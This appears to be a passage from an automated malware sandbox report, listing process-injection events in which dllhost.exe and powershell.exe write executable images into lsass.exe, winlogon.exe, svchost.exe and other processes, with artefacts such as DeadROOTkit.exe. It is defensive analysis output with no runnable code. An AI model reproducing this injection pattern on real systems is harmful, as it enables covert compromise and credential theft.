Source: C:\Windows\System32\dllhost.exe | Memory written: C:\Program Files (x86)\xZBprBbdeOnkbIgDEbppLASfVbhbLQAMejmEurgzlXmYYoBEGDdiYFIuaFom\LfzsCkCtsZlGsmeVs.exe base: F10000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe | Memory written: C:\Program Files (x86)\xZBprBbdeOnkbIgDEbppLASfVbhbLQAMejmEurgzlXmYYoBEGDdiYFIuaFom\LfzsCkCtsZlGsmeVs.exe base: 1390000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe | Memory written: C:\Program Files (x86)\xZBprBbdeOnkbIgDEbppLASfVbhbLQAMejmEurgzlXmYYoBEGDdiYFIuaFom\LfzsCkCtsZlGsmeVs.exe base: B00000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe | Memory written: C:\Program Files (x86)\xZBprBbdeOnkbIgDEbppLASfVbhbLQAMejmEurgzlXmYYoBEGDdiYFIuaFom\LfzsCkCtsZlGsmeVs.exe base: 1470000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe | Memory written: C:\Program Files (x86)\xZBprBbdeOnkbIgDEbppLASfVbhbLQAMejmEurgzlXmYYoBEGDdiYFIuaFom\LfzsCkCtsZlGsmeVs.exe base: 5C0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe | Memory written: C:\Program Files (x86)\xZBprBbdeOnkbIgDEbppLASfVbhbLQAMejmEurgzlXmYYoBEGDdiYFIuaFom\LfzsCkCtsZlGsmeVs.exe base: FC0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe | Memory written: C:\Program Files (x86)\xZBprBbdeOnkbIgDEbppLASfVbhbLQAMejmEurgzlXmYYoBEGDdiYFIuaFom\LfzsCkCtsZlGsmeVs.exe base: C50000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe | Memory written: C:\Program Files (x86)\xZBprBbdeOnkbIgDEbppLASfVbhbLQAMejmEurgzlXmYYoBEGDdiYFIuaFom\LfzsCkCtsZlGsmeVs.exe base: 910000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe | Memory written: C:\Program Files (x86)\xZBprBbdeOnkbIgDEbppLASfVbhbLQAMejmEurgzlXmYYoBEGDdiYFIuaFom\LfzsCkCtsZlGsmeVs.exe base: 5B0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe | Memory written: C:\Program Files (x86)\xZBprBbdeOnkbIgDEbppLASfVbhbLQAMejmEurgzlXmYYoBEGDdiYFIuaFom\LfzsCkCtsZlGsmeVs.exe base: EF0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe | Memory written: C:\Program Files (x86)\xZBprBbdeOnkbIgDEbppLASfVbhbLQAMejmEurgzlXmYYoBEGDdiYFIuaFom\LfzsCkCtsZlGsmeVs.exe base: EE0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe | Memory written: C:\Program Files (x86)\xZBprBbdeOnkbIgDEbppLASfVbhbLQAMejmEurgzlXmYYoBEGDdiYFIuaFom\LfzsCkCtsZlGsmeVs.exe base: BD0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe | Memory written: C:\Program Files (x86)\xZBprBbdeOnkbIgDEbppLASfVbhbLQAMejmEurgzlXmYYoBEGDdiYFIuaFom\LfzsCkCtsZlGsmeVs.exe base: 3B0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe | Memory written: C:\Program Files (x86)\xZBprBbdeOnkbIgDEbppLASfVbhbLQAMejmEurgzlXmYYoBEGDdiYFIuaFom\LfzsCkCtsZlGsmeVs.exe base: F40000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe | Memory written: C:\Program Files (x86)\xZBprBbdeOnkbIgDEbppLASfVbhbLQAMejmEurgzlXmYYoBEGDdiYFIuaFom\LfzsCkCtsZlGsmeVs.exe base: 790000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe | Memory written: C:\Program Files (x86)\xZBprBbdeOnkbIgDEbppLASfVbhbLQAMejmEurgzlXmYYoBEGDdiYFIuaFom\LfzsCkCtsZlGsmeVs.exe base: F50000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe | Memory written: C:\Program Files (x86)\xZBprBbdeOnkbIgDEbppLASfVbhbLQAMejmEurgzlXmYYoBEGDdiYFIuaFom\LfzsCkCtsZlGsmeVs.exe base: 8C0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe | Memory written: C:\Program Files (x86)\xZBprBbdeOnkbIgDEbppLASfVbhbLQAMejmEurgzlXmYYoBEGDdiYFIuaFom\LfzsCkCtsZlGsmeVs.exe base: C50000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe | Memory written: C:\Program Files (x86)\xZBprBbdeOnkbIgDEbppLASfVbhbLQAMejmEurgzlXmYYoBEGDdiYFIuaFom\LfzsCkCtsZlGsmeVs.exe base: 1210000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe | Memory written: C:\Program Files (x86)\xZBprBbdeOnkbIgDEbppLASfVbhbLQAMejmEurgzlXmYYoBEGDdiYFIuaFom\LfzsCkCtsZlGsmeVs.exe base: BD0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe | Memory written: C:\Program Files (x86)\xZBprBbdeOnkbIgDEbppLASfVbhbLQAMejmEurgzlXmYYoBEGDdiYFIuaFom\LfzsCkCtsZlGsmeVs.exe base: DA0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe | Memory written: C:\Program Files (x86)\xZBprBbdeOnkbIgDEbppLASfVbhbLQAMejmEurgzlXmYYoBEGDdiYFIuaFom\LfzsCkCtsZlGsmeVs.exe base: C60000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe | Memory written: C:\Program Files (x86)\xZBprBbdeOnkbIgDEbppLASfVbhbLQAMejmEurgzlXmYYoBEGDdiYFIuaFom\LfzsCkCtsZlGsmeVs.exe base: FC0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe | Memory written: C:\Program Files (x86)\xZBprBbdeOnkbIgDEbppLASfVbhbLQAMejmEurgzlXmYYoBEGDdiYFIuaFom\LfzsCkCtsZlGsmeVs.exe base: 9B0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe | Memory written: C:\Users\Public\DeadXClient.exe base: 1B410000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe | Memory written: C:\Users\Public\DeadROOTkit.exe base: 1B9F0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe | Memory written: C:\Windows\System32\wbem\WmiPrvSE.exe base: 13B38860000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe | Memory written: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe base: 1F080000000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe | Memory written: C:\Windows\System32\conhost.exe base: 1EF2F790000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe | Memory written: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe base: 24D21B40000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe | Memory written: C:\Windows\System32\conhost.exe base: 2023BB50000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe | Memory written: C:\Windows\System32\schtasks.exe base: 1A8EC190000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe | Memory written: C:\Windows\System32\conhost.exe base: 2CCE00B0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe | Memory written: C:\Users\Public\Deadsvchost.exe base: 560000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe | Memory written: C:\Users\Public\Deadsvchost.exe base: 940000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe | Memory written: C:\Users\user\AppData\Local\DeadROOTkit.exe base: 11C0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe | Memory written: C:\Windows\System32\wbem\WMIADAP.exe base: 1E9CEF00000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe | Memory written: C:\Windows\System32\wbem\WMIADAP.exe base: 1E9CEF60000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe | Memory written: PID: 2580 base: 8BA0000 value: 4D
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Thread register set: target process: 6968
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Memory written: C:\Windows\System32\dllhost.exe base: 140000000
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Memory written: C:\Windows\System32\dllhost.exe base: 140001000
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Memory written: C:\Windows\System32\dllhost.exe base: 140004000
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Memory written: C:\Windows\System32\dllhost.exe base: 140006000
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Memory written: C:\Windows\System32\dllhost.exe base: 140007000
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Memory written: C:\Windows\System32\dllhost.exe base: F1B13F3010
Source: C:\Windows\System32\dllhost.exe | Memory written: C:\Windows\System32\winlogon.exe base: 225DC610000
Source: C:\Windows\System32\dllhost.exe | Memory written: C:\Windows\System32\lsass.exe base: 202C0AB0000
Source: C:\Windows\System32\dllhost.exe | Memory written: C:\Windows\System32\svchost.exe base: 2A6612D0000
Source: C:\Windows\System32\dllhost.exe | Memory written: C:\Windows\System32\dwm.exe base: 2BAAF1E0000
Source: C:\Windows\System32\dllhost.exe | Memory written: C:\Windows\System32\svchost.exe base: 26A87990000
Source: C:\Windows\System32\dllhost.exe | Memory written: C:\Windows\System32\svchost.exe base: 17953770000
Source: C:\Windows\System32\dllhost.exe | Memory written: C:\Windows\System32\svchost.exe base: 2295D530000
Source: C:\Windows\System32\dllhost.exe | Memory written: C:\Windows\System32\svchost.exe base: 253067D0000
Source: C:\Windows\System32\dllhost.exe | Memory written: C:\Windows\System32\svchost.exe base: 1845B390000
Source: C:\Windows\System32\dllhost.exe | Memory written: C:\Windows\System32\svchost.exe base: 1ADEBFD0000
Source: C:\Windows\System32\dllhost.exe | Memory written: C:\Windows\System32\svchost.exe base: 1D559040000
Source: C:\Windows\System32\dllhost.exe | Memory written: C:\Windows\System32\svchost.exe base: 241A9E70000
Source: C:\Windows\System32\dllhost.exe | Memory written: C:\Windows\System32\svchost.exe base: 1CD73160000
Source: C:\Windows\System32\dllhost.exe | Memory written: C:\Windows\System32\svchost.exe base: 2824E860000
Source: C:\Windows\System32\dllhost.exe | Memory written: C:\Windows\System32\svchost.exe base: 21B473C0000
Source: C:\Windows\System32\dllhost.exe | Memory written: C:\Windows\System32\svchost.exe base: 2086F9D0000
Source: C:\Windows\System32\dllhost.exe | Memory written: C:\Windows\System32\svchost.exe base: 17183BC0000
Source: C:\Windows\System32\dllhost.exe | Memory written: C:\Windows\System32\svchost.exe base: 23FD3F70000
Source: C:\Windows\System32\dllhost.exe | Memory written: C:\Windows\System32\svchost.exe base: 1D2A4150000
Source: C:\Windows\System32\dllhost.exe | Memory written: C:\Windows\System32\svchost.exe base: 275BDF30000
Source: C:\Windows\System32\dllhost.exe | Memory written: C:\Windows\System32\svchost.exe base: 1AAC0260000
Source: C:\Windows\System32\dllhost.exe | Memory written: C:\Windows\System32\svchost.exe base: 203C9F30000
Source: C:\Windows\System32\dllhost.exe | Memory written: C:\Windows\System32\svchost.exe base: 1B5645B0000
Source: C:\Windows\System32\dllhost.exe | Memory written: C:\Windows\System32\svchost.exe base: 1BB7B2A0000
Source: C:\Windows\System32\dllhost.exe | Memory written: C:\Windows\System32\svchost.exe base: 1C004F60000
Source: C:\Windows\System32\dllhost.exe | Memory written: C:\Windows\System32\svchost.exe base: 24E2AB40000
Source: C:\Windows\System32\dllhost.exe | Memory written: C:\Windows\System32\svchost.exe base: 2644ADB0000
Source: C:\Windows\System32\dllhost.exe | Memory written: C:\Windows\System32\spoolsv.exe base: 1990000
Source: C:\Windows\System32\dllhost.exe | Memory written: C:\Windows\System32\svchost.exe base: 20D25DA0000
Source: C:\Windows\System32\dllhost.exe | Memory written: C:\Windows\System32\svchost.exe base: 26EF5350000
Source: C:\Windows\System32\dllhost.exe | Memory written: C:\Windows\System32\svchost.exe base: 2A7F0D60000
Source: C:\Windows\System32\dllhost.exe | Memory written: C:\Windows\System32\svchost.exe base: 23D0FFB0000
Source: C:\Windows\System32\dllhost.exe | Memory written: C:\Windows\System32\svchost.exe base: 1B1C2570000
Source: C:\Windows\System32\dllhost.exe | Memory written: C:\Windows\System32\svchost.exe base: 2108B940000
Source: C:\Windows\System32\dllhost.exe | Memory written: C:\Windows\System32\svchost.exe base: 29166930000
Source: C:\Windows\System32\dllhost.exe | Memory written: C:\Program Files\Common Files\microsoft shared\ClickToRun\OfficeClickToRun.exe base: 21C13EF0000
Source: C:\Windows\System32\dllhost.exe | Memory written: C:\Windows\System32\svchost.exe base: 1988D570000
Source: C:\Windows\System32\dllhost.exe | Memory written: C:\Windows\System32\svchost.exe base: 13869B40000
Source: C:\Windows\System32\dllhost.exe | Memory written: C:\Windows\System32\svchost.exe base: 1E1CC740000
Source: C:\Windows\System32\dllhost.exe | Memory written: C:\Windows\System32\svchost.exe base: 2855DA70000
Source: C:\Windows\System32\dllhost.exe | Memory written: C:\Windows\System32\svchost.exe base: 2BF199D0000
Source: C:\Windows\System32\dllhost.exe | Memory written: C:\Windows\System32\svchost.exe base: 15AF3890000
Source: C:\Windows\System32\dllhost.exe | Memory written: C:\Windows\System32\svchost.exe base: 21A03B80000
Source: C:\Windows\System32\dllhost.exe | Memory written: C:\Windows\System32\sihost.exe base: 1CD40E40000
Source: C:\Windows\System32\dllhost.exe | Memory written: C:\Windows\System32\svchost.exe base: 151A6530000
Source: C:\Windows\System32\dllhost.exe | Memory written: C:\Windows\System32\svchost.exe base: 19E27BC0000
Source: C:\Windows\System32\dllhost.exe | Memory written: C:\Windows\System32\svchost.exe base: 17D7B150000
Source: C:\Windows\System32\dllhost.exe | Memory written: C:\Windows\System32\svchost.exe base: 1BE621A0000
Source: C:\Windows\System32\dllhost.exe | Memory written: C:\Windows\System32\svchost.exe base: 2252F480000
Source: C:\Windows\System32\dllhost.exe | Memory written: C:\Windows\System32\ctfmon.exe base: 1F28B4B0000
Source: C:\Windows\System32\dllhost.exe | Memory written: C:\Windows\System32\svchost.exe base: 184683D0000
Source: C:\Windows\System32\dllhost.exe | Memory written: C:\Windows\explorer.exe base: 8BA0000
Source: C:\Windows\System32\dllhost.exe | Memory written: C:\Windows\System32\svchost.exe base: 1972E260000
Source: C:\Windows\System32\dllhost.exe | Memory written: C:\Windows\System32\dasHost.exe base: 2246C5E0000
Source: C:\Windows\System32\dllhost.exe | Memory written: C:\Windows\System32\svchost.exe base: 221D5930000
Source: C:\Windows\System32\dllhost.exe | Memory written: C:\Windows\System32\RuntimeBroker.exe base: 1ECFC650000
Source: C:\Windows\System32\dllhost.exe | Memory written: C:\Windows\System32\RuntimeBroker.exe base: 1D178740000
Source: C:\Windows\System32\dllhost.exe | Memory written: C:\Windows\System32\svchost.exe base: 1A633B40000
Source: C:\Windows\System32\dllhost.exe | Memory written: C:\Windows\System32\svchost.exe base: 2928D0A0000
Source: C:\Windows\System32\dllhost.exe | Memory written: C:\Windows\System32\dllhost.exe base: 13DAB4C0000
Source: C:\Windows\System32\dllhost.exe | Memory written: C:\Windows\System32\smartscreen.exe base: 1A22A640000
Source: C:\Windows\System32\dllhost.exe | Memory written: C:\Windows\System32\svchost.exe base: 21C6CF30000
Source: C:\Windows\System32\dllhost.exe | Memory written: C:\Windows\System32\wbem\WmiPrvSE.exe base: 1EF641A0000
Source: C:\Windows\System32\dllhost.exe | Memory written: C:\Windows\System32\audiodg.exe base: 1D349350000
Source: C:\Windows\System32\dllhost.exe | Memory written: C:\Windows\System32\RuntimeBroker.exe base: 23B60DB0000
Source: C:\Windows\System32\dllhost.exe | Memory written: C:\Windows\System32\RuntimeBroker.exe base: 2135E7B0000
Source: C:\Windows\System32\dllhost.exe | Memory written: C:\Windows\System32\svchost.exe base: 1F22F7C0000
Source: C:\Windows\System32\dllhost.exe | Memory written: C:\Windows\System32\ApplicationFrameHost.exe base: 1F6E8150000
Source: C:\Windows\System32\dllhost.exe | Memory written: C:\Windows\System32\RuntimeBroker.exe base: 20C52340000
Source: C:\Windows\System32\dllhost.exe | Memory written: C:\Windows\ImmersiveControlPanel\SystemSettings.exe base: 2589DA90000
Source: C:\Windows\System32\dllhost.exe | Memory written: C:\Windows\System32\oobe\UserOOBEBroker.exe base: 1F5602E0000
Source: C:\Windows\System32\dllhost.exe | Memory written: C:\Windows\System32\wbem\WmiPrvSE.exe base: 151C5AA0000
                          Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 270F8FD0000Jump to behavior
                          Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 16BF33D0000Jump to behavior
                          Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\dllhost.exe base: 1A348770000Jump to behavior
                          Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\SysWOW64\wbem\WmiPrvSE.exe base: 2FB0000Jump to behavior
                          Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\conhost.exe base: 1F3EAD60000Jump to behavior
                          Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\RuntimeBroker.exe base: 18686DD0000Jump to behavior
                          Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\RuntimeBroker.exe base: 24F4DB10000Jump to behavior
                          Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 27E6F950000Jump to behavior
                          Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\xZBprBbdeOnkbIgDEbppLASfVbhbLQAMejmEurgzlXmYYoBEGDdiYFIuaFom\LfzsCkCtsZlGsmeVs.exe base: F50000Jump to behavior
                          Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\xZBprBbdeOnkbIgDEbppLASfVbhbLQAMejmEurgzlXmYYoBEGDdiYFIuaFom\LfzsCkCtsZlGsmeVs.exe base: 10C0000Jump to behavior
                          Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\xZBprBbdeOnkbIgDEbppLASfVbhbLQAMejmEurgzlXmYYoBEGDdiYFIuaFom\LfzsCkCtsZlGsmeVs.exe base: 10C0000Jump to behavior
                          Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\xZBprBbdeOnkbIgDEbppLASfVbhbLQAMejmEurgzlXmYYoBEGDdiYFIuaFom\LfzsCkCtsZlGsmeVs.exe base: EF0000Jump to behavior
                          Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\xZBprBbdeOnkbIgDEbppLASfVbhbLQAMejmEurgzlXmYYoBEGDdiYFIuaFom\LfzsCkCtsZlGsmeVs.exe base: F70000Jump to behavior
                          Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\xZBprBbdeOnkbIgDEbppLASfVbhbLQAMejmEurgzlXmYYoBEGDdiYFIuaFom\LfzsCkCtsZlGsmeVs.exe base: 2DC0000Jump to behavior
                          Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\xZBprBbdeOnkbIgDEbppLASfVbhbLQAMejmEurgzlXmYYoBEGDdiYFIuaFom\LfzsCkCtsZlGsmeVs.exe base: F50000Jump to behavior
                          Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\xZBprBbdeOnkbIgDEbppLASfVbhbLQAMejmEurgzlXmYYoBEGDdiYFIuaFom\LfzsCkCtsZlGsmeVs.exe base: EC0000Jump to behavior
                          Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\xZBprBbdeOnkbIgDEbppLASfVbhbLQAMejmEurgzlXmYYoBEGDdiYFIuaFom\LfzsCkCtsZlGsmeVs.exe base: A50000Jump to behavior
                          Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\xZBprBbdeOnkbIgDEbppLASfVbhbLQAMejmEurgzlXmYYoBEGDdiYFIuaFom\LfzsCkCtsZlGsmeVs.exe base: F30000Jump to behavior
                          Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\xZBprBbdeOnkbIgDEbppLASfVbhbLQAMejmEurgzlXmYYoBEGDdiYFIuaFom\LfzsCkCtsZlGsmeVs.exe base: ED0000Jump to behavior
                          Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\xZBprBbdeOnkbIgDEbppLASfVbhbLQAMejmEurgzlXmYYoBEGDdiYFIuaFom\LfzsCkCtsZlGsmeVs.exe base: 13E0000Jump to behavior
                          Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\xZBprBbdeOnkbIgDEbppLASfVbhbLQAMejmEurgzlXmYYoBEGDdiYFIuaFom\LfzsCkCtsZlGsmeVs.exe base: F00000Jump to behavior
                          Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\xZBprBbdeOnkbIgDEbppLASfVbhbLQAMejmEurgzlXmYYoBEGDdiYFIuaFom\LfzsCkCtsZlGsmeVs.exe base: F30000Jump to behavior
                          Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\xZBprBbdeOnkbIgDEbppLASfVbhbLQAMejmEurgzlXmYYoBEGDdiYFIuaFom\LfzsCkCtsZlGsmeVs.exe base: F70000Jump to behavior
                          Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\xZBprBbdeOnkbIgDEbppLASfVbhbLQAMejmEurgzlXmYYoBEGDdiYFIuaFom\LfzsCkCtsZlGsmeVs.exe base: E20000Jump to behavior
                          Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\xZBprBbdeOnkbIgDEbppLASfVbhbLQAMejmEurgzlXmYYoBEGDdiYFIuaFom\LfzsCkCtsZlGsmeVs.exe base: B70000Jump to behavior
                          Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\xZBprBbdeOnkbIgDEbppLASfVbhbLQAMejmEurgzlXmYYoBEGDdiYFIuaFom\LfzsCkCtsZlGsmeVs.exe base: F20000Jump to behavior
                          Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\xZBprBbdeOnkbIgDEbppLASfVbhbLQAMejmEurgzlXmYYoBEGDdiYFIuaFom\LfzsCkCtsZlGsmeVs.exe base: F70000Jump to behavior
                          Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\xZBprBbdeOnkbIgDEbppLASfVbhbLQAMejmEurgzlXmYYoBEGDdiYFIuaFom\LfzsCkCtsZlGsmeVs.exe base: 15B0000Jump to behavior
                          Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\xZBprBbdeOnkbIgDEbppLASfVbhbLQAMejmEurgzlXmYYoBEGDdiYFIuaFom\LfzsCkCtsZlGsmeVs.exe base: 2B60000Jump to behavior
                          Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\xZBprBbdeOnkbIgDEbppLASfVbhbLQAMejmEurgzlXmYYoBEGDdiYFIuaFom\LfzsCkCtsZlGsmeVs.exe base: F40000Jump to behavior
                          Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\xZBprBbdeOnkbIgDEbppLASfVbhbLQAMejmEurgzlXmYYoBEGDdiYFIuaFom\LfzsCkCtsZlGsmeVs.exe base: 1350000Jump to behavior
                          Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\xZBprBbdeOnkbIgDEbppLASfVbhbLQAMejmEurgzlXmYYoBEGDdiYFIuaFom\LfzsCkCtsZlGsmeVs.exe base: F20000Jump to behavior
                          Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\xZBprBbdeOnkbIgDEbppLASfVbhbLQAMejmEurgzlXmYYoBEGDdiYFIuaFom\LfzsCkCtsZlGsmeVs.exe base: 1310000Jump to behavior
                          Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\xZBprBbdeOnkbIgDEbppLASfVbhbLQAMejmEurgzlXmYYoBEGDdiYFIuaFom\LfzsCkCtsZlGsmeVs.exe base: F50000Jump to behavior
                          Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\xZBprBbdeOnkbIgDEbppLASfVbhbLQAMejmEurgzlXmYYoBEGDdiYFIuaFom\LfzsCkCtsZlGsmeVs.exe base: 1270000Jump to behavior
                          Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\xZBprBbdeOnkbIgDEbppLASfVbhbLQAMejmEurgzlXmYYoBEGDdiYFIuaFom\LfzsCkCtsZlGsmeVs.exe base: AA0000Jump to behavior
                          Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\xZBprBbdeOnkbIgDEbppLASfVbhbLQAMejmEurgzlXmYYoBEGDdiYFIuaFom\LfzsCkCtsZlGsmeVs.exe base: F20000Jump to behavior
                          Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\xZBprBbdeOnkbIgDEbppLASfVbhbLQAMejmEurgzlXmYYoBEGDdiYFIuaFom\LfzsCkCtsZlGsmeVs.exe base: 2F40000Jump to behavior
                          Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\xZBprBbdeOnkbIgDEbppLASfVbhbLQAMejmEurgzlXmYYoBEGDdiYFIuaFom\LfzsCkCtsZlGsmeVs.exe base: E70000Jump to behavior
                          Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\xZBprBbdeOnkbIgDEbppLASfVbhbLQAMejmEurgzlXmYYoBEGDdiYFIuaFom\LfzsCkCtsZlGsmeVs.exe base: 1150000Jump to behavior
                          Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\xZBprBbdeOnkbIgDEbppLASfVbhbLQAMejmEurgzlXmYYoBEGDdiYFIuaFom\LfzsCkCtsZlGsmeVs.exe base: ED0000Jump to behavior
                          Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\xZBprBbdeOnkbIgDEbppLASfVbhbLQAMejmEurgzlXmYYoBEGDdiYFIuaFom\LfzsCkCtsZlGsmeVs.exe base: C20000Jump to behavior
                          Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\xZBprBbdeOnkbIgDEbppLASfVbhbLQAMejmEurgzlXmYYoBEGDdiYFIuaFom\LfzsCkCtsZlGsmeVs.exe base: A40000Jump to behavior
                          Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\xZBprBbdeOnkbIgDEbppLASfVbhbLQAMejmEurgzlXmYYoBEGDdiYFIuaFom\LfzsCkCtsZlGsmeVs.exe base: FC0000Jump to behavior
                          Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\xZBprBbdeOnkbIgDEbppLASfVbhbLQAMejmEurgzlXmYYoBEGDdiYFIuaFom\LfzsCkCtsZlGsmeVs.exe base: 1380000Jump to behavior
                          Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\xZBprBbdeOnkbIgDEbppLASfVbhbLQAMejmEurgzlXmYYoBEGDdiYFIuaFom\LfzsCkCtsZlGsmeVs.exe base: 900000Jump to behavior
                          Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\xZBprBbdeOnkbIgDEbppLASfVbhbLQAMejmEurgzlXmYYoBEGDdiYFIuaFom\LfzsCkCtsZlGsmeVs.exe base: C00000Jump to behavior
                          Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\xZBprBbdeOnkbIgDEbppLASfVbhbLQAMejmEurgzlXmYYoBEGDdiYFIuaFom\LfzsCkCtsZlGsmeVs.exe base: 14C0000Jump to behavior
                          Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\xZBprBbdeOnkbIgDEbppLASfVbhbLQAMejmEurgzlXmYYoBEGDdiYFIuaFom\LfzsCkCtsZlGsmeVs.exe base: D00000Jump to behavior
                          Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\xZBprBbdeOnkbIgDEbppLASfVbhbLQAMejmEurgzlXmYYoBEGDdiYFIuaFom\LfzsCkCtsZlGsmeVs.exe base: 9F0000Jump to behavior
                          Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\xZBprBbdeOnkbIgDEbppLASfVbhbLQAMejmEurgzlXmYYoBEGDdiYFIuaFom\LfzsCkCtsZlGsmeVs.exe base: 13F0000Jump to behavior
                          Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\xZBprBbdeOnkbIgDEbppLASfVbhbLQAMejmEurgzlXmYYoBEGDdiYFIuaFom\LfzsCkCtsZlGsmeVs.exe base: B40000Jump to behavior
                          Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\xZBprBbdeOnkbIgDEbppLASfVbhbLQAMejmEurgzlXmYYoBEGDdiYFIuaFom\LfzsCkCtsZlGsmeVs.exe base: F50000Jump to behavior
                          Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\xZBprBbdeOnkbIgDEbppLASfVbhbLQAMejmEurgzlXmYYoBEGDdiYFIuaFom\LfzsCkCtsZlGsmeVs.exe base: D00000Jump to behavior
                          Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\xZBprBbdeOnkbIgDEbppLASfVbhbLQAMejmEurgzlXmYYoBEGDdiYFIuaFom\LfzsCkCtsZlGsmeVs.exe base: 510000Jump to behavior
